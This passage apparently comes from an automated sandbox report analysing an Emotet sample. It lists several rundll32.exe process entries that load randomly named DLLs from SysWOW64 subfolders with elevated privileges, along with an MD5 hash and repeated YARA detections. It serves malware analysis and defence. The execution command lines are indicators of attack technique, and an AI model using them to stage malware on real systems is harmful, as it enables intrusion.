                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:12
                                                                          Start time:21:30:08
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:14
                                                                          Start time:21:30:27
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:15
                                                                          Start time:21:30:32
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          General

                                                                          Target ID:16
                                                                          Start time:21:30:49
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          General

                                                                          Target ID:17
                                                                          Start time:21:30:57
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                          Disassembly

                                                                          No disassembly